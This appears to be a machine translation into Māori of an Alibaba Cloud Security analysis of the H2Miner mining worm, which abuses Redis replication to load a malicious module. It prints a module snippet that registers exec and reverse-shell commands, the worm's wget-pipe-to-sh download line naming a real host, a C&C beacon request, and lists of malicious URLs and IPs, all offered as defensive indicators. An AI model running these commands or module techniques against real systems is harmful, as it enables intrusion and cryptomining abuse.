I tetahi ra i mua, i whakaekehia tetahi o nga kaitoro o taku kaupapa e tetahi noke rite. I te rapu whakautu ki te patai "he aha tera?" I kitea e ahau he tuhinga nui na te roopu Alibaba Cloud Security. I te mea kare au i kite i tenei tuhinga i runga i a Habré, i whakatau ahau ki te whakamaori mo koe ake <3
urunga
I tata nei, ka kitea e te roopu haumaru a Alibaba Cloud he pakarutanga ohorere o H2Miner. Ko tenei momo kutukutu kino e whakamahi ana i te kore whakaaetanga, kupuhipa ngoikore ranei mo Redis hei kuaha ki o punaha, ka mutu ka tukutahi i tana ake waahanga kino me te taurekareka ma te tukutahitanga rangatira-pononga ka mutu ka tango i tenei waahanga kino ki te miihini whakaekea ka mahia he kino. tohutohu.
I nga wa o mua, ko nga whakaeke i runga i o punaha i mahia ma te whakamahi i tetahi tikanga e pa ana ki nga mahi kua whakaritea, ki nga taviri SSH ranei i tuhia ki to miihini i muri i te urunga o te kaitukino ki Redis. Waimarie, kaore e taea te whakamahi i tenei tikanga na te raru o te mana whakaaetanga, na te rereke ranei o nga putanga punaha. Heoi, ko tenei tikanga ki te uta i tetahi kōwae kino ka taea te whakahaere tika i nga whakahau a te kaitukino, ka uru atu ranei ki te anga, he kino mo to punaha.
Na te maha o nga kaitoro Redis e whakahaerehia ana i runga i te Ipurangi (tata ki te 1 miriona), ko te roopu haumaru a Alibaba Cloud, hei whakamaharatanga hoa, e kii ana kia kaua nga kaiwhakamahi e tiritiri i a Redis ki runga ipurangi me te tirotiro i nga wa katoa i te kaha o a raatau kupuhipa me te mea kua whakararu. kōwhiringa tere.
H2Miner
Ko te H2Miner he botnet maina mo nga punaha Linux ka taea te whakaeke i to punaha i roto i nga momo huarahi, tae atu ki te kore whakaaetanga i roto i nga whakaraeraetanga o Hadoop yarn, Docker, me te Redis remote command execution (RCE). Ka mahi te botnet ma te tango i nga tuhinga kino me te kino ki te maina i o raraunga, whakawhānui i te whakaeke whakapae, me te pupuri i nga korero whakahau me te whakahaere (C&C).
Redis RCE
Ko nga matauranga mo tenei kaupapa i tohatohahia e Pavel Toporkov i ZeroNights 2018. I muri i te putanga 4.0, ka tautoko a Redis i tetahi waahanga whakauru whakauru e hoatu ana ki nga kaiwhakamahi te kaha ki te uta na nga konae i whakaemihia me C ki Redis ki te whakahaere i nga whakahau Redis motuhake. Ko tenei mahi, ahakoa whai hua, kei roto he whakaraeraetanga, i roto i te aratau rangatira-pononga, ka taea te tukutahi i nga konae me te taurekareka ma te aratau fullresync. Ka taea te whakamahi e te kaitukino ki te whakawhiti i nga konae kino. Ka mutu te whakawhitinga, ka utaina e te hunga whakaeke te kōwae ki runga i te tauira Redis i whakaekea ka mahia he whakahau.
Malware Worm Analysis
I tata nei, i kitea e te roopu haumaru Alibaba Cloud kua piki ohorere te rahi o te roopu maina kino H2Miner. E ai ki te tātaritanga, ko te tikanga whanui o te whakaekenga ko enei e whai ake nei:
Ka whakamahia e H2Miner te RCE Redis mo te whakaeke katoa. I te tuatahi ka whakaekea e nga kaiwhaiwhai nga kaimau Redis kaore i parea, nga kaitoro ranei me nga kupuhipa ngoikore.
Na ka whakamahi ratou i te whakahau config set dbfilename red2.so ki te huri i te ingoa kōnae. I muri i tenei, ka mahia e nga kaiwhaiwhai te whakahau slaveof ki te tautuhi i te wahitau kaihautu tukurua ariki-pononga.
Ina whakatauhia e te tauira Redis i whakaekea he hononga rangatira-pononga me te Redis kino na te kaitukino, ka tukuna e te kaitukino te waahanga kua pangia ma te whakamahi i te whakahau fullresync ki te tukutahi i nga konae. Ko te kōnae red2.so ka tangohia ki te miihini whakaekea. Ka whakamahia e te hunga whakaeke te ./red2.so te kōwae uta ki te uta i tenei konae. Ka taea e te kōwae te whakahaere i nga whakahau mai i te kaikoeke, ka timata ranei i te hono whakamuri (kuwaha) kia uru atu ki te miihini whakaekea.
if (RedisModule_CreateCommand(ctx, "system.exec",
DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
if (RedisModule_CreateCommand(ctx, "system.rev",
RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
return REDISMODULE_ERR;
I muri i te mahi i tetahi whakahau kino penei / bin / sh -c wget -q -O-http://195.3.146.118/unk.sh | sh> / dev / null 2> & 1, ka tautuhia ano e te kaitukino te ingoa konae taapiri me te tango i te waahanga punaha hei horoi i nga tohu. Engari, ka noho tonu te kōnae red2.so ki runga i te miihini whakaekea. Ka tohutohuhia nga kaiwhakamahi ki te aro ki te aroaro o taua konae whakapae i roto i te kōpaki o a raatau tauira Redis.
I tua atu i te patu i etahi tukanga kino ki te tahae rauemi, ka whai te kaikohuru i tetahi tuhinga kino ma te tango me te whakahaere i nga konae rua kino ki . Ko te tikanga ko te ingoa tukanga me te ingoa whaiaronga kei roto i te kinsing i runga i te kaihautu ka tohu pea kua pangia taua miihini e tenei huaketo.
E ai ki nga hua miihini whakamuri, ka mahia e te malware nga mahi e whai ake nei:
- Te tuku ake i nga konae me te mahi
- Te maina
- Te pupuri i te whakawhitiwhiti korero a C&C me te whakahaere i nga whakahau whakaeke
Whakamahia te papatipu mo te matawai o waho hei whakawhanui i to awe. I tua atu, ko te wahitau IP o te tūmau C&C he pakeke-waehere i roto i te kaupapa, a ka korerohia e te kaihautu whakaeke ki te kaitautoko korero C&C ma te whakamahi i nga tono HTTP, kei reira nga korero mo te zombie (tūmau taupatupatu) ka kitea i roto i te pane HTTP.
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
Ko etahi atu tikanga whakaeke
Nga wahi noho me nga hononga e whakamahia ana e te noke
/kino
• 142.44.191.122/t.sh
• 185.92.74.42/h.sh
• 142.44.191.122/spr.sh
• 142.44.191.122/spre.sh
• 195.3.146.118/unk.sh
s&c
• 45.10.88.102
• 91.215.169.111
• 139.99.50.255
• 46.243.253.167
• 195.123.220.193
Tuhinga
Tuatahi, kaua e uru mai a Redis mai i te Ipurangi me te tiaki i tetahi kupuhipa kaha. He mea nui ano kia tirohia e nga kaihoko kaore he konae red2.so kei roto i te raarangi Redis me te kore he "kinsing" i roto i te ingoa konae / tukanga i runga i te kaihautu.
Source: will.com